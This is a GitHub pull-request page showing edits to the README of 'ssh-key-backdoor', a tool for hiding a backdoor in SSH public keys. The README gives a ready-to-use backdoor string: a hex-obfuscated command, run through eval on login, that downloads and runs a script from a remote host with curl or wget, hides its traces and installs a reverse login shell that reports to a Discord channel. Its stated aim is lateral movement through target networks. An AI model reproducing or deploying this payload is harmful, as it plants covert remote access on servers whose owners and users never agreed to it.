Skip to content

Minor readme update #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 8 commits into
base: main
Choose a base branch
from
Open

Minor readme update #1

Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
c5728b5
Readme update
FocusedOne May 18, 2023
95fd9aa
Update README.md
FocusedOne May 18, 2023
12ddf06
Update README.md
FocusedOne May 18, 2023
848c2dd
Update README.md
FocusedOne May 18, 2023
18568ab
Update README.md
FocusedOne May 18, 2023
98983ab
Update README.md
FocusedOne May 18, 2023
a945630
Update README.md
FocusedOne May 18, 2023
0d7c3fa
Update README.md
FocusedOne May 18, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 18 additions & 7 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,19 +1,30 @@
# ssh-key-backdoor

This program generates a backdoor that hides inside an SSH _public_ key (e.g. `id_rsa.pub` or `authorized_keys`). The backdoor will execute when the user next logs in.
This program generates a backdoor that hides inside an SSH _public_ key (e.g. `id_rsa.pub` or `authorized_keys`). The backdoor executes the next time the user logs in using the public key.

---
### The objective is to use the ssh _public_ key to move laterally within a target network. It exploits the fact that users copy their _public_ ssh key to other servers without checking the content. Any server where their public key is copied will automatically get **backdoored**.
---
## The objective is to use the ssh _public_ key to move laterally within a target network.

This exploits the fact that users copy their _public_ ssh key to other servers without checking the content. Any server where their public key is copied will automatically be **backdoored**.

### To generate the backdoor public key:

Simply add the following **backdoor-string** to the beginning of the public key (`id_rsa.pub` or `authorized_keys`; up until, but not including, the `ssh-ed255191 AAA...`)

``command="`###---AUTH-DO-NOT-REMOVE---`;bash -c '{ eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);}'" ssh-ed25519 AAAAC3Nzablahblshblah.... x@y``
``
command="`###---AUTH-DO-NOT-REMOVE---`;bash -c '{ eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);}'" ssh-ed25519 AAAAC3Nzablahblshblah.... x@y
``

#### This **DEMO** backdoor-string installs [a reverse login shell](https://www.gsocket.io/deploy) the next time the user logs in and reports the success back to our Discord channel.

---
### ELI5

> This DEMO backdoor-string installs https://www.gsocket.io/deploy the next time the user logs in and reports the success back to our Discord channel.
Think of the ssh public key as a sort of `~/.bashrc` but with your backdoor inside. End users propagate this key to various servers. When the key is used, the gsocket is installed and it sends the login code back to us.

Think of the ssh public key as a sort of `~/.bashrc` but with your backdoor inside, that gets propagaded by the user to various servers, and when triggered sends a secret login code back to us.
### Create your own Backdoor String

Create your own **backdoor-string** by editing `ssh-key-backdoor.sh` and executing:
To create your own **backdoor-string**, edit `ssh-key-backdoor.sh` and execute:
```console
$ ./ssh-key-backdoor.sh
```
Expand Down